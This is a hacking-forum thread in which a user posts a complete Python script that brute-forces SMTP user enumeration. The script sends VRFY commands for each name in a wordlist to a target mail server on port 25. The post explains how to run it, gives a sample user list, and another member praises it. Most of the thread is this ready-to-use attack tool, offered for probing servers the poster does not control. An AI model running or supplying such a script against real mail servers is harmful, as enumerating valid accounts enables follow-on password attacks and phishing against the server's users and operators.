iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (2)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Need help with smtp user brute script
  • m0rph
    Posts: 332 

    #!/usr/bin/python

    #Unauthenticated VRFY Username Brute Force
    #written by m0rph
    #www.iexploit.org
    #15MAY2011

    import socket, sys

    #If no input

    if len(sys.argv) != 3:
         print \"Usage: vrfybrute.py <target IP> <user list>\"
         sys.exit(0)

    #Function for connecting, reading from file, and guessing username from file

    def brute() :

         target = str(sys.argv[1]) #Define target's IP
         count = 0

         try :
              dict = open(sys.argv[2], \"rb\") #Define User List
              buffer = dict.read().splitlines()
         except :
              print \"\n\t[-]Sorry, cannot open file\"
         try :
              while True :
                   user = buffer[count] #Defines user as the current username in the buffer
                   s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                   connect=s.connect((target, 25))
                   banner=s.recv(1024)
                   print banner
                   s.send('VRFY ' + user + '\r\n') #Send VRFY command with user
                   result=s.recv(1024)
                   print result
                   s.close()
                   count=count+1  #Set count to next user in list
              else :
                   print \"\n\t[-]Could not connect to server.\"
                   sys.exit(0)
         except :
              print \"\n\t[-]End of user list.\"
              sys.exit(0)

    while True :
         brute()


    Sorry about the false alarm everyone, I solved all the issues I was having.

    This script will take a user list and brute force them with an SMTP server through the VRFY command.

    In otherwords, it's an ok way to enumerate users on an smtp server, should you find one that you don't have to authenticate with to use VRFY on.

    Sample layout of a user list compatible with this:

    root
    bob
    jane
    jeff
    alice
    billy


    Cheers guys
    while( !(succeed = try() ) );
  • Xin
    Posts: 3,251
    Nice script, once you have a final version you should post it in Python/Source Code & Tutorials
    Xin
Add a Comment